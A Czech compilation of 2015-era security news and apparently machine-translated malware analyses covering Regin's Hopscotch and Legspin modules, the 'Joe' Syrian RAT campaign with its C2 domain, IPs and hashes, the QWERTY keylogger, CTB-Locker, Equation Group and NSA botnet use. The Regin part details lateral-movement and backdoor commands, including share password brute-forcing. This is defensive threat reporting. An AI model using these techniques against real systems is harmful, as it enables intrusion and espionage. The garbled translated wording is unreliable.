IT security Meeting 2015 ukáže nové směry v antimalwarových řešeních
25.2.2015 Viry Konference IT Security Meeting 2015, kterou pořádá společnost Auriga Systems za podpory magazínů Computerworld a Security World, nabídne nejnovější informace o pokročilých technologiích obsažených v produktech firem Eset, Kaspersky, McAfee a Novell. Akce se uskuteční ve dnech 19. - 20. 3. 2015 v Brně a Praze, a také 23. 4. 2015 v Praze.
Konkrétně půjde o dvě samostatné akce, kdy mezi hlavní témata první z nich patří představení zcela nové generace antivirového řešení Eset pro firemní použití a novinek v portfoliu Novell, jejichž osvědčené řešení pro bezpečnou komunikaci a řízení identit lze efektivně využít v prostředí firem jakékoli velikosti.
Na samostatné akci v Praze se účastníci dozvědí o moderních technologiích pro boj s novodobými kybernetickými hrozbami v podání bezpečnostního řešení Kaspersky.
Druhá část prezentace pak bude zaměřená na představení technologie McAfee SIEM pro sběr a vyhodnocování logů a McAfee DLP pro ochranu citlivých informací před jejich únikem a jejich praktické využitelnosti v podnikovém prostředí.
Akce je po registraci na adrese obchod@aurigasystems.cz a následném potvrzení registrace zcela bezplatná.
Nový červ krade data z telefonů s Androidem
22.2.2015 Viry Až příště vypnete svůj androidový telefon, raději z něj také vyjměte baterii. Společnost AVG totiž objevila nebezpečného červa, který předstírá vypnutí telefonu a následně ze zařízení krade data.
Jak uvedlo AVG, jakmile uživatel zmáčkne na svém androidovém telefonu infikovaném novým červem tlačítko na zapnutí/vypnutí, objeví se falešné dialogové okno. Červ následně zobrazí (falešnou) animaci, která se ukazuje při vypínání telefonu a poté se zařízení tváří jako vypnuté.
„I když je obrazovka černá, telefon však stále běží,“ uvedlo AVG. „Když je telefon v tomto stavu, červ může provádět hovory, pořizovat fotografie a vykonávat řadu dalších úkonů bez uživatelova vědomí.“
Červ může infikovat pouze telefon, který si uživatel sám upravil (tzv. rootoval). Díky tomu je v bezpečí většina běžných uživatelů, kteří své telefony nijak neupravují. Jak však uvedlo AVG, někteří výrobci své telefony prodávají již narootované, díky čemuž červ může tato zařízení snáze infikovat.
Není příliš pravděpodobné, že by se nový červ objevil v Google Play Store, jelikož Google blokuje aplikace s potenciálně rizikovými funkcemi. V e-shopech s aplikacemi třetích stran byste na něj však mohli bez problémů narazit. Jak radí AVG, pokud si tedy chcete být jisti, že je váš telefon opravdu vypnutý, raději z něj vyjměte baterii.
Nový virus je schovaný přímo v pevných discích. Pomůže jen rozbití 18. února 2015 Viry Společnost Kaspersky objevila, že na firmware pevných disků většiny výrobců útočí virus, který umožní sledovat dění na počítači. Běžnými prostředky se jej přitom nelze zbavit. Firma naznačuje, že za ním stojí vládní úřady, patrně nechvalně proslulá špionážní agentura NSA.
Cíle skupiny označované jako Equation Group Cíle skupiny označované jako Equation Group, která stojí i za novým virem | foto: Kaspersky Společnosti Kaspersky přinesla rozsáhlou zprávu o skupině, která šířila virus (pdf od 10. kapitoly, anglicky), který je specifický svým chováním. Dokáže totiž napadnout firmware, tedy software, který ovládá pevný disk (HDD) a je jeho součástí. Jestliže se dostane do počítače má za úkol přeprogramovat firmware HDD, doplnit ho o vlastní kód a umožnit vytvoření skrytých sektorů na tomto disku.
Podle firmy je to možné pouze tak, že tvůrce viru měl tento firmware k dispozici. Buď jej v případě vládní agentury získal přímo od výrobce, nebo se k němu dostal pokoutným způsobem, třeba prostřednictvím napadení systémů výrobců disků a/nebo jejich zaměstnanců.
Firma Western Digital oslovená agenturou Reuters přitom takovou spolupráci odmítla. „Neposkytujeme zdrojové kódy vládním agenturám,“ uvedl mluvčí společnosti Steve Shattuck. Mluvčí firmy Seagate Clive Over zase tvrdí, že přijali bezpečnostní opatření, která mají zabránit manipulaci s kódem a jeho reverznímu inženýrství, tady zpětnému odkrytí kódu. I tak se může vládní agentura ke kódu dostat, pokud třeba simuluje softwarové vývojáře nebo jej získá v rámci bezpečnostní prověrky kódu.
Virus se přitom nevyhýbá žádnému z velkých výrobců hardwaru. Kaspersky tak odhalil u tohoto závadného softwaru záznamy o discích firem Corsair, Hitachi, IBM, Micron, Samsung Electronics, OCZ, Seagate Technology, Toshiba, Western Digital Technologies a dalších.
Takto ukrytý virus je odolný proti všem běžně využívaným bezpečnostním programům. I když si uživatel disk zformátuje a přeinstaluje, stále v něm zůstává a může si vytvářet skryté oddíly, kam nahrává zachycené údaje. Vedle toho může na počítač instalovat další závadné programy, které mohou sloužit k zachytávání komunikace a dalších aktivit na počítači. V podstatě jedinou jistou cestou, jak se jej zbavit, je disk přestat používat a případně jej zničit. Zda pomůže přepsání firmwaru, není jisté.
Inženýři z firmy Kaspersky však uvádějí, že reálně narazili jen na velice málo takto napadených disků, z čehož odvozují, že si tento virus útočníci nechávají jen pro velice důležité cíle.
Za vším hledej NSA I když Kaspersky konkrétně neuvádí, kdo za virem stojí, ve své zprávě naznačuje, že virus má podobné vlastnosti jako americko-izraelský virus Stuxnet, který byl podle dostupných informací vyvinout americkými tajnými službami za účelem sabotáže íránského nukleárního programu (více v článku o viru, který napadl i vesmírnou stanici ISS).
Podle Kaspersky za novým virem stojí skupina, kterou označuje jako Equation Group. Ta má operovat minimálně od roku 2001, ale její stopy mohou vést až do poloviny devadesátých let minulého století. Její operace směřují především do oblastí, jako jsou Írán, Rusko, Pákistán, Afghánistán, Indie, Čína, ale nevyhýbají se ani evropským státům, jako je například Británie.
Jak funguje Regin Složitost viru Regin ve schématu firmy Symantec ukazuje jeho pětistupňovou strukturu. Regin je vícestupňový virus, kde je každý stupeň s výjimkou prvního skrytý a zašifrovaný. Spuštěním první vrstvy se nastartuje řetězec dešifrování a nahrávání každé další fáze v rámci pěti etap. Každý jednotlivý stupeň přitom poskytuje jen velmi málo informací o kompletním balíčku. Přitom jen získáním obsahu všech pěti fází je podmíněna analýza, která umožní pochopit celou hrozbu.
Skupina používá různé prostředky k šíření dalších špionážních prográmků, jako je mezi počítačovými útočníky oblíbené napadení webových stránek, šíření zavirovaných USB pamětí a optických disků.
Stojí za mnohými typy sofistikovaných škodlivých prográmků, jako je například Regin, který vyvolal údiv svou komplexností. Stejně jako tyto viry si i novinka vybírá své oběti a zpravidla se nenahraje do systémů, které nejsou v oblasti zájmu jejího tvůrce.
I proto padá podezření na americkou špionážní agenturu NSA. Agentuře Reuters se pro tento předpoklad dokonce podařilo nepřímé důkazy. Bývalý zaměstnanec NSA, jehož identita samozřejmě nebyla zveřejněna, agentuře sdělil, že analýza společnosti Kaspersky je správná a že si lidé ve zpravodajské agentuře cení tento sledovací program stejně vysoko jako Stuxnet. Další bývalý zpravodajský operativec pro agenturu také tvrdil, že techniku ukrývání spywaru v pevných discích vyvinula právě NSA. Mluvčí NSA tyto informace nijak nekomentovala.
Analýza Regin je peklo a Legspin 1.2.2015 Viry
Při vysokých hrozby profilu, jako je Regin , chyby jsou neuvěřitelně vzácné. Nicméně, pokud jde o lidi psaní kódu, některé chyby jsou nevyhnutelné. Mezi nejzajímavější, co jsme pozorovali v malware provozu Regin byly zapomenutého codenames pro některé ze svých modulů.
Jedná se o:
Peklo Legspin Willischeck U_STARBUCKS Rozhodli jsme se analyzovat dvě z těchto modulů podrobněji - peklo a Legspin .
I přes celkovou propracovanost (a někdy dokonce i více než-inženýrství) platformy Regin, tyto nástroje jsou jednoduché, přímočaré a poskytují interaktivní konzole rozhraní pro operátory Regin. To, co z nich dělá zajímavý je fakt, že byly vytvořeny před mnoha lety, a dokonce byly vytvořeny před platformě Regin sám.
Modul Hopscotch
MD5 6c34031d7a5fc2b091b623981a8ae61c Velikost 36864 bytů Typ Win32 EXE Sestaveno 2006.03.22 19:09:29 (GMT) Tento modul má další binární uvnitř, uložený jako zdroj 103:
MD5 42eaf2ab25c9ead201f25ecbdc96fb60 Velikost 18432 bytů Typ Win32 EXE Sestaveno 2006.03.22 19:09:29 (GMT) Tento spustitelný modul byl navržen jako samostatný interaktivní nástroj pro boční pohyb . Neobsahuje žádné hrdinské činy, ale místo toho spoléhá na již dříve získaných pověření k ověřování sám na vzdáleném počítači s použitím standardních API.
Modul přijímá název cílového počítače a volitelně název vzdáleného souboru ze standardního vstupu (operátora). Útočníci si mohou vybrat z několika možností v době uzavření a nástroj poskytuje čitelné odpovědi a návrhy na možnou vstupu.
Zde je příklad "peklo" běžící uvnitř virtuálního stroje:
Mechanismus autentizace (SU nebo NETUSE) [S] / N: Pokračovat? [N]: Soubor stejného jména byl již na vzdáleném počítači - ne mazání ... Modul lze použít dva postupy pro ověřování se v cílovém počítači: buď připojení ke standardní sdílené s názvem "IPC $" (metoda zvaná "NET USE"), nebo přihlášení se jako místní uživatel ("SU", nebo "user switch" ), který má dostatečná práva k případné další akce.
To pak extrahuje užitečného zatížení spustitelný soubor ze svých zdrojů a zapíše jej do umístění v cílovém počítači. Výchozí umístění pro užitečné zatížení je: \\ % cíl% \ ADMIN $ \ System32 \ SVCSTAT.EXE . Po úspěšném se připojuje k Service Manager vzdáleného stroje a vytvoří novou službu s názvem "Service Control Manager" spustíte užitečné zatížení. Služba je začal okamžitě a pak se zastavil a po uplynutí jedné sekundy provedení.
Modul vytváří obousměrný šifrovaný komunikační kanál s dálkovým užitečného zatížení SVCSTAT.EXE pomocí dvou pojmenované kanály. Jedním z potrubí se používá, aby předal informace od operátora do užitečného zatížení a dalších zapisuje data z užitečného zatížení na standardní výstup. Data jsou šifrována pomocí algoritmu RC4 a počáteční výměna klíčů je chráněn pomocí asymetrického šifrování.
\\%target%\pipe\{66fbe87a-4372-1f51-101d-1aaf0043127a} \\%target%\pipe\{44fdg23a-1522-6f9e-d05d-1aaf0176138a} Po dokončení nástroj odstraní vzdálený soubor a zavře ověřené zasedání, účinně odstraní všechny stopy na operaci.
Užitečné zatížení Modul SVCSTAT.EXE zahajuje svou kopii v procesu Dllhost.exe a pak připraví odpovídající pojmenované kanály na cílovém počítači a čeká na příchozí data. Jakmile je původní modul se připojuje na trubku, se nastaví šifrování komunikace potrubí a čeká na příchozí shell kódu.
Spustitelný je vstřikován v novém procesu Dllhost.exe nebo svchost.exe a popraven, se jeho vstupní a výstupní madla přesměrováni na vzdálené plugin, který inicioval útoku. To umožňuje obsluze ovládat vstřikovaného modul a komunikovat s ním.
Legspin modul
MD5 29105f46e4d33f66fee346cfd099d1cc Velikost 67584 bytů Typ Win32 EXE Sestaveno 2003.03.17 08:33:50 (GMT) Tento modul byl také vyvinut jako samostatný příkazového řádku nástroje pro správu počítače. Při spuštění na dálku se stává mocným backdoor. Stojí za zmínku, že program má plnou podporu konzoly a funkce barevného výstupu při spuštění lokálně. To může dokonce rozlišovat mezi konzolemi, které podporují Windows Console API a TTY kompatibilní s terminály, které přijímají escape kódy pro zbarvení.
regin2_1
"Legspin" výstup v okně standardní konzole s barevným zvýrazněním
Kromě časové razítko kompilace nalezené v záhlaví PE, existují dva odkazy, které ukazují do roku 2003 jako jeho skutečné rok sestavení. Program vytiskne dvě verze štítky:
2002-09-A, označovanou jako "lib verzi" 2003-03- Kromě toho program používá funkce starší API, jako "NetBIOS", která byla představena v systému Windows 2000 a zastaralé v systému Windows Vista.
Poté, co začal a inicializaci poskytuje obsluze interaktivní příkazového řádku, čeká na příchozí příkazy. Seznam dostupných příkazů, je docela velký a umožňuje operátorům vykonávat mnoho správní opatření. Některé příkazy vyžadují dodatečné informace, které jsou požadované od operátora, a příkazy poskytují textový popis dostupných parametrů. Program je vlastně administrativní skořápka, která je určena pro provoz ručně útočníkem / uživatele.
Příkaz Popis CD Změňte aktuální pracovní adresář dir ls dirl dirs Seznam souborů a adresářů dehet Najít soubory odpovídající dané masky a časové rozmezí, a zapsat jejich obsah archív XOR šifrována strom Vytiskněte strom adresáře pomocí pseudographics regin2_2 odpadky Přečtěte si a vytisknout obsah "Recycle Bin" adresář Windows dostat Načíst libovolný soubor z cílového počítače, LZO komprimovaný dát Nahrajte libovolný soubor do cílového počítače, LZO komprimovaný del Odstranění souboru ren mv copy cp Kopírování nebo přesunutí souboru do nového umístění GTM Získejte vytváření souborů, přístup psát časová razítka a pamatovat si hodnoty STM Set vytvoření souboru, přístup, napište časová razítka na dříve získaných hodnot MTM Upravte dříve načtené souboru časová razítka prohledávání řetězce Najít a vytisknout všechny čitelné řetězce z daného souboru více Vytiskněte si obsah libovolného souboru přístup Načíst a vytisknout DACL záznamy souborů a adresářů audit Načíst a vytisknout Sací záznamy souborů a adresářů finfo Načíst a vytisknout informaci o verzi z daného souboru cs Dump prvních 10.000 bytů z libovolného souboru, nebo z několika systémových souborů: advapi32.dll kernel32.dll msvcrt.dll ntdll.dll ntoskrnl.exe win32k.sys cmd.exe ping.exe ipconfig.exe tracert.exe netstat.exe net.exe user32.dll gdi32.dll shell32.dll
lnk Hledání LNK souborů, analyzovat a tisknout jejich obsah info Vytiskněte si obecné informace o systému: Typ CPU Stav paměti Název počítače Čísla verzí Windows a Internet Explorer Cesta instalace Windows Codepage dl Vytisknout informace o discích: Typ Volný / používá místo Seznam oddílů, jejich typy souborových systémů ps Seznam všech běžících procesů logdump Nedokončený, zobrazí pouze popis parametru reglist Dump informace z registru o místní nebo vzdálené úlu windows Výčet všech dostupných počítačů a všech otevřených oken pohled Seznam všech viditelných serverů v doméně domény Seznam řadiče domény v síti akcie Seznam všech viditelných akcie sítě regs Vytisknout další informace o systému z registru: IE verze Outlook Express verze Přihlašovací výchozí uživatelské jméno Datum Instalace systému Datum systému BIOS Frekvence procesoru Kořenový systém adresář ips Seznam informace síťový adaptér: DHCP / static IP adresa Adresa výchozí brány doba Získejte aktuální čas z místního nebo vzdáleném počítači kdo Seznam jména současných uživatelů a domén přístupné strojem net nbtstat tracert ipconfig netstat ping Spusťte odpovídající systémový nástroj a vytisknout výsledky tel Připojte se k danému TCP portu hostitele, poslat řetězec od operátora, vytisknout odpověď DNS Arps Vyřešit hostitele pomocí DNS nebo ARP požadavky Uživatelé Seznam informace o všech uživatelských účtů Správci Seznam informace o uživatelských účtů s administrátorskými právy skupiny Seznam informací o uživatelských skupin věří Seznam informací o uživatelských účtech mezidoménové důvěry balíčky Tisk názvy instalovaných softwarových balíků sharepw Spustit brute-force útok přihlášení se snaží získat hesla vzdálené sdílené sharelist Připojení ke vzdálené sdílené srvinfo Získat aktuální informace o konfiguraci pro zadaný serveru netuse Připojit odpojte nebo seznamu Síťové akcie NetShare Vytvořit nebo odstranit sdílené síťové složky v aktuálním počítači nbstat Seznam NetBIOS LAN adaptéru běh Vytvořit proces a přesměrovat svůj výstup na provozovatele systém Spusťte libovolný příkaz pomocí WinExec API výjezd Ukončení programu sada Nastavit různé interní proměnné použité v ostatních příkazů shellu su Přihlaste se jako jiný uživatel zabít Ukončit proces jeho PID kpinst Upravit hodnotu registru: [HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon] systém Tato hodnota by měla normálně přejděte na "lsass.exe".
SVC DRV Vytvořit, upravit nebo odstranit systémové služby pomoct ? Tisk seznamu podporovaných příkazů Legspin modul jsme zpět nemá vestavěný C & C mechanismu. Namísto toho se spoléhá na platformě Regin přesměrovat vstup konzole / výstup do / z operátorů.
Závěry
Na rozdíl od většiny ostatních modulů Regin, Legspin a Hopscotch se zdají být samostatná nástroje vyvinuté mnohem dříve. Legspin backdoor zejména se datuje do roku 2003 a možná i 2002. To je třeba zdůraznit, že ne všechny nasazení Regin obsahovat Legspin modul; Ve většině případů, útočníci spravovat své oběti prostřednictvím dalších funkcí Regin platformy.
To znamená, že Legspin mohly být použity nezávisle na platformě Regin, jako jednoduchý backdoor spolu s vstupní / výstupní obalu.
I když více informací o Regin jsou stále k dispozici, je stále hodně, že zůstává neznámý. Jedna věc je již jasné - co víme o Regin se pravděpodobně již v důchodu informace, které byly nahrazeny novými moduly a techniky, jak plyne čas.
Syrská malware Část 2: Kdo je Joe? 1.2.2015 Viry Úvod
Kaspersky Lab by chtěl upozornit uživatele na Blízkém východě pro nové útoky škodlivého softwaru dodávána prostřednictvím syrské novinkách a fórech sociálních sítí. Malware spisovatelé používáte více technik dodat své soubory a lákat oběti na jejich spuštění, vytvoření efektivního infekce vektor. Hlavně v závislosti na sociální inženýrství, útočníci využívají důvěru obětí v fórech sociálních sítí, zvědavost v následujících novinky týkající se konfliktu v Sýrii, jejich postavení v Sýrii, kromě nedostatku Cyber Security vědomí. Poté, co zločinci infikovat počítač oběti, útočníci mají plný přístup a kontrolu nad zařízením oběti.
V první zprávě o syrské malware , Kaspersky Lab podrobně mnoho útoků se používá v Sýrii špehovat uživatele, zpráva obsahuje útoky z různých týmů a mnoho zdrojů.
Tento příspěvek navazuje na jednu z oblastí, zdánlivě nejvíce aktivní v poslední době: thejoe.publicvm.com
Malware soubory byly nalezeny na aktivistických stránkách a fórech sociálních sítí, jiné byly hlášeny regionálních organizací, jako je CyberArabs .
Zprávy, které zmiňují " Joe" https://citizenlab.org/2013/06/a-call-to-harm/ https://www.eff.org/files/2013/12/28/quantum_of_surveillance4d.pdf
Všechny soubory schovat pod kapotou plnohodnotnou variantu RAT, Vzdálená správa Trojan (Bitfrose / NjRAT / Shadowtech / Darkcomet ...), které jsou schopné získat plnou kontrolu nad obětí strojů a zařízení, sledování jakýkoli pohyb a přístup ke všem souborů , Thejoe.publicvm.com doména se vztahuje na mnoho vzorků, zde se zaměříme na nejdůležitější a láká, že s největší pravděpodobností shromáždí nejvyšší počet cílených obětí, který se odhaduje na tisíce.
Existuje mnoho faktorů, a subjektům, které ve hře v tomto případě se zaměříme pouze na malware a skutečností, které byly nalezeny při analýze, prezentuje pouze relevantní informace, v naději, že stanovení jasné kontext pro tento výzkum.
Co je to informace, které měla na theJoe? Co Joe dělal v poslední době? Kdo je Joe?
Co je to informace, které měli na Joe?
Joe je jedním z nejaktivnějších počítačoví zločinci v Sýrii a na Blízkém východě, zaměřené na všechny typy uživatelů, je následující údaje shromážděné na Joe a jeho činnosti.
Informace o Domain "thejoe.publicvm.com"
Joe používá dynamické domény, aby bylo možné změnit jeho IP adresu a udržet anonymitu: thejoe.publicvm.com doména byla pozorována za použití následujících IP adresy v Sýrii a Rusku:
31.9.48.146 31.9.48.119 31.9.48.146 31.9.48.80 31.9.48.78 31.9.48.119 31.8.48.7 TCP porty používané při útocích: 1234, 1177, 5522.
Malware informace
Ze vzorků malwaru odebraných, jsme byli schopni najít řetězce v kódu, ze zařízení se systémem Windows používané Joe.
Kanál je šíření škodlivého softwaru souborů pod názvem "Lions revoluce", nebo jiné ...
Co se Joe dělal v poslední době?
Joe byl zaneprázdněn v uplynulém období; V níže jsme se zobrazí některé z nejvíce grafických a láká vzorků shromážděných služby Kaspersky zpravodajských a Security Network (KSN Kaspersky cloud), popisovat jejich funkčnosti a jak Joe je schopen použít k situaci v Sýrii, aby uživatele automaticky otevřené soubory, i když mají podezření infikované. Mezi cílové země jsou Sýrie, Turecko, Libanon a Saúdská Arábie. Počet obětí se odhaduje kolem roku 2000.
6 nové příběhy:
Pojďme opravit SSL zranitelnost Teď Pojďme vyčistit Skype! Věděli jste aktualizaci na nejnovější verzi VPN? Pojďme Zkontrolujte, zda je vaše telefonní číslo je mezi sledovanými čísly Účet šifrování aplikace Facebook Jaký je váš oblíbený bezpečnostní produkt? Joe_1
V návaznosti na zranitelná místa v OpenSSL, a množství zpráv dosáhla, se počítačoví zločinci se snaží těžit z uživatelského vnímání takové zprávy, ale nedostatečné povědomí o tom, jak by mohla být slabá místa opravit.
Joe_2
Demonstrace video na Heartbleed zranitelnosti + Odkaz na stažení "Fix" s infekcí
Joe_3 Joe_4 Joe_5
2 - Nyní Pojďme vyčistit Skype!
MD5 Hash: d6ab8ca6406fefe29e91c0604c812ff9 Název souboru: Skype.exe
Další sociální inženýrství trik používá lákat zločince stáhnout a spustit škodlivý soubor, skype čistší "chránit a šifrovat skype komunikace".
Joe_6 Joe_7
3 - jste aktualizaci na nejnovější verzi VPN?
MD5 Hash: 2e07e8622b4e997f6543fc0497452dad Název souboru: VPN.exe
Psiphon, legitimní aplikace, která využívá po celém světě pro ochranu anonymity, je mimořádně účinný a použity v Sýrii pro uživatele chránit jejich provoz ze špehování, nebo odposlech, aplikace je zde vázán s malware a vydal pro uživatele, jako aktualizovanou verzí.
Joe_8 Joe_9
4 - Pojďme Zkontrolujte, zda je vaše telefonní číslo je mezi sledovanými čísly
MD5 Hash: ad9a18e1db0b43cb38da786eb3bf7c00 Název souboru: Syriatel.exe
Další z populárních malware soubory, se používá k falešný nástroj, který se používá pro kontrolu čísla mobilních telefonů pod dohledem a seřazenou podle místa, dodávaný jako "unikly programu" k obětem.
Joe_10 Joe_11 Joe_12
5 - Účet šifrování aplikace Facebook
MD5 Hash: efdaa73e0ac1b045d5f2214cadd77f09 Název souboru: Rooms.exe
Joe_13 Joe_14
6 - Jaký je váš oblíbený bezpečnostní produkt?
Jedním z posledních souborů použitých infikovat uživatele je zcela odlišný: vazba nástroj Kaspersky Lab s malware. TDSSKiller vyvinutý společností Kaspersky Lab, je výkonný bezplatný nástroj, který dokáže detekovat a odstranit konkrétní seznam rootkit malware rodin.
Bound malwarem, Joe je pomocí názvu Kaspersky dodat malware ve snaze přilákat oběti otevřít a důvěřovat soubory Posílá.
Nástroj KL
Kdo je "Joe"
Byly analyzovány stovky vzorků týkající se syrským malware, jeden z vzorků, extrakty se více dokumentů, v jednom z nichž jsme byli schopni najít metadat skluz, který se extrahuje do určité zajímavé informace.
Metadata skluzu by chlap pomocí "Joe", jako jeho přezdívka, odhalil jeho osobní e-mail, který používáte další výzkum povede jeho další e-maily, plná identita, sociální stránkách ...
Joe_15
Na Facebooku:
Joe_16
Na LinkedIn:
Joe_18
Indikátory kompromisu
MD5 Hash Jméno (jména), použitý pro soubor malware První pohledu f62cfd2484ff8c5b1a4751366e914613 Adobe.exe Reader.exe Card.exe 09. 2013 012f25d09fd53aeeddc11c23902770a7 89e6ae33b170ee712b47449bbbd84784 قائمة الأرهاب .zip ("seznam terorismu") soubor extrakty do JPG a škodlivé SCR 01. 2014 dc6166005db7487c9a8b32d938fec846 62023eb959a79bbdecd5aa167b51541f TheSSL.exe ("odstranit SSL slabosti") SSL Cleaner.rar 04. 2014 cc694b1f8f0cd901f65856e419233044 Desktop.exe Empty.exe Host.exe 03. 2014 d6ab8ca6406fefe29e91c0604c812ff9 Skype.exe Skypecleaner.exe 07. 2014 2e07e8622b4e997f6543fc0497452dad VPN.exe 09. 2014 efdaa73e0ac1b045d5f2214cadd77f09 Rooms.exe (k "šifrování Facebook") 11. 2014 39d0d7e6880652e58b2d4d6e50ca084c Photo.exe 11. 2014 abf3cfecd2e194961fc97dac34f57b24 Ram.exe Setup.exe 11. 2014 a238f8ab946516b6153816c5fb4307be tdskiler.exe (k "odstranění škodlivého softwaru") 01. 2015 6379afd35285e16df4cb81803fde382c Locker.exe (k "šifrování / dešifrování" souborů) 01. 2015 Kaspersky Lab detekuje všechny škodlivé soubory používané v útocích. Všechny soubory jsou aktivně využívány zločinci v době této zprávy.
Závěr
Syrská malware má silnou závislost na sociální inženýrství a aktivní rozvoj škodlivých variant. Nicméně, většina z nich se rychle odhalí svou pravou podstatu, když pečlivě prohlédnout; a toto je jeden z hlavních důvodů pro přitlačování syrských uživatelům být extra hlídat, co stáhnout a provádět vrstvený obranný přístup. Očekáváme, že tyto útoky vyvíjet a to jak v kvalitě a množství.
Srovnáme-li Regin modul 50251 a "QWERTY" keylogger 1.2.2015 Viry
17. ledna 2015 Spiegel.de publikoval rozsáhlý článek na základě dokumentů získaných od Edward Snowden. Ve stejné době, ale za předpokladu, kopii škodlivého programu s kódovým označením "QWERTY" ( http://www.spiegel.de/media/media-35668.pdf ), údajně používán několika vlád ve svých operacích CNE.
Jsme obdrželi kopii škodlivých souborů publikovaných Der Spiegel, a když jsme je analyzovali, že nás okamžitě připomněl Regin . Při pohledu na úzce kód, jsme došli k závěru, že "QWERTY" malware má stejné funkce s Regin 50.251 plugin.
Analýza
QWERTY modul balíček se skládá ze tří binárních souborů a doprovodné konfiguračních souborů. Jeden soubor z package- 20123.sys - je zvláště zajímavý.
V "20123.sys" je součástí režimu jádra v keylogger. Jak se ukázalo, byl postaven ze zdrojového kódu, který lze nalézt také jeden Regin modul, je "50251" plugin.
Použití binární rozdíl je snadné rozpoznat významnou část kódu, která je sdílená mezi oběma soubory:
regin3_1
Většina sdíleného kódu patří k funkci, která přistupuje k ovladač klávesnice systému:
regin3_2
Většina "qwerty" komponent volání pluginy ze stejného balíčku (s čísly plugin 20121-20123), ale je zde také jeden kus kódu, který odkazuje na pluginy z plošiny Regin. Jedna konkrétní část kódu je používat jak na "QWERTY" 20123 modulem a Regin je 50.251 protějšek, a to řeší plugin 50225, který lze nalézt v virtuální souborové systémy v Regin. V Regin je plugin 50225 je reponsible pro kernel-mode hákování.
regin3_3
To je důkazem toho, Qwerty plugin může fungovat pouze jako součást platformy Regin , využití do jádra hákovým funkce z Earth 50.225.
Jako další důkaz, že oba moduly používají stejnou softwarovou platformu , můžeme se podívat na funkce vyvážené pořadovým 1 obou modulů. Obsahují spouštěcí kód, který lze nalézt v žádném jiném plugin z Regin, a zahrnují aktuální počet plugin, který je registrován v rámci platformy umožní více se zaměřit na modulu. To má smysl pouze v případě, že moduly jsou použity s platformou Orchestrator Regin.
regin3_4
Důvodem, proč tyto dva moduly mají různé plug-ID je neznámá. Je to snad proto, že se zadlužuje různými subjekty, z nichž každý má své vlastní přidělené plugin ID rozsahy.
Závěry
Naše analýza QWERTY malware publikované Der Spiegel uvádí, že je plugin tak, aby fungoval část platformy Regin. QWERTY keylogger nefunguje jako samostatný modul, se opírá o jaderných hákových funkcí, které jsou poskytovány v Regin modulem 50225. Vzhledem k extrémní složitosti platformy Regin a malá šance, že to může být duplicitní někdo bez přístupu jeho sourcecodes, dojdeme k závěru, že malware vývojáři QWERTY a vývojáři Regin jsou stejné nebo pracují společně.
Dalším důležitým poznatkem je, že Regin pluginy jsou uloženy v šifrované a komprimované VFS, což znamená, že neexistují přímo na počítači oběti v "nativní" formát. Načte platforma dispečerské a provádí tam pluginy při startu. Jediný způsob, jak chytit keylogger je skenováním systémové paměti nebo dekódování VFSes.
Vyděračskému malwaru jen tak konec nebude
23.1.2014 Viry Nový vyděračský malware CTB-Locker, který zašifruje data a poté požaduje po obětech výkupné, objevili analytici Esetu.
Škodlivý kód se šíří v Evropě a v latinské Americe. Podle Esetu jde o začátek kampaně, která může nabýt velkých rozměrů.
Infekce začíná tím, že oběť dostane e-mail (obvykle s předmětem „Fax“) s přílohou, která imituje faxovou zprávu. Příloha však obsahuje malware typu downloader – jde o malware Win32/TrojanDownloader.Elenoocka.A, což je klíčová komponenta masivních útoků na klienty bank, které od května 2014 probíhají i v České republice. Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
V případě, že oběť otevře domnělou faxovou zprávu, dojde k infikování trojanem Elenoocka, který se vzápětí pokusí stáhnout z ovládacích serverů šifrovací malware FileCoder.DA a spustit ho.
Pokud se mu to podaří, následuje obdobný scénář jako v případě obávaného CryptoLockeru. Malware zašifruje na napadeném počítači soubory, zamkne obrazovku a zobrazí na ní výzvu k zaplacení výkupného v bitcoinech – v přepočtu je to téměř 50 tisíc korun.
„CTB-Locker se od známějšího a rozšířenějšího CryptoLockeru liší především způsobem využití šifrovacího algoritmu. Jinak je to obdobná hrozba, a platí pro ni stejná pravidla pro prevenci: zálohovat data, aktualizovat software a chránit počítače,“ doporučuje Pablo Ramos z Esetu.
NSA vytváří vlastní počítačové červy a využívá botnety
22.1.2014 Viry NSA monitoruje tzv. botnety složené z tisíců či milionů infikovaných počítačů po celém světě a v případě potřeby může tato americká vládní agentura botnety s využitím technologie pojmenované jako Quantumbot infikovat pomocí svých vlastních červů. S informací přišel deník Der Spiegel.
Jeden z tajných dokumentů zveřejněných Edwardem Snowdenem a publikovaný deníkem Der Spiegel obsahuje podrobné informace o programu zvaném DEFIANTWARRIOR, v rámci kterého se odborníci NSA nabourávali do botnetů a používali je k cíleným útokům.
Jinými slovy, pokud byl (či stále je) počítač uživatele infikován nebezpečným červem hackery, vedle něj v určitých případech může svého červa umístit do systému také NSA a následně tento počítač využívat pro své vlastní útoky. Ty pak není možné vypátrat zpět k NSA.
Podle zveřejněných dokumentů je zmíněná operace prováděna pouze na neamerických počítačích. Boty, které jsou v USA, jsou nahlášeny FBI.
NSA také odposlouchává a sbírá data ukradená různými červy třetích stran, obzvláště těch, které do světa vypustily cizí špionážní agentury. Tuto praktiku NSA nazývá jako „sběr dat čtvrtou stranou“.
Jak uvedl Der Spiegel, například v roce 2009 NSA zachytila kybernetický útok Číňanů proti americkému ministerstvu obrany a její odborníci „byli schopni operaci infiltrovat“. NSA následně zjistila, že Číňané kradou data také z OSN, tudíž pokračovala v monitorování těchto útočníků a tedy i sběru dat z OSN.
V dalším případě, který tajný dokument popisuje jako „sběr dat pátou stranou“ pak zaměstnanec NSA inflitroval špionážní program Jižné Koreje zaměřený na Severní Koreu. Jinými slovy, NSA odposlouchávala zahraniční špionážní službu, která špehovala jinou zahraniční špionážní agenturu.
Dokumenty zveřejněné německým deníkem také přibližují možnosti NSA a špionážních agentur Velké Británie, Kanady, Austrálie a Nového Zélandu (označované jako Five Eyes Partners) při tvorbě a distribuci počítačových červů.
Jeden z dokumentů z Communications Security Establishment Canada (CSEC) popisuje unifikovanou platformu s označením WARRIORPRIDE, kterou používají členové Five Eyes Partners a lze ji rozšířit pomocí přídavků. Der Spiegel popsal například keylogger označovaný jako QWERTY, který se choval jako přídavek pro WARRIORPRIDE.
Podobných programů je v NSA řada. Například v rámci jiného programu s názvem PITIEDFOOL jeden z členů Five Eye Partners vyvinul červa, který umí nadálku v přednastavený čas tajně z pevného disku počítače ukrást data, smazat jej a přitom vypnout funkci Volume Shadow Copy (VSS), která je ve Windows využívána k obnově dat.
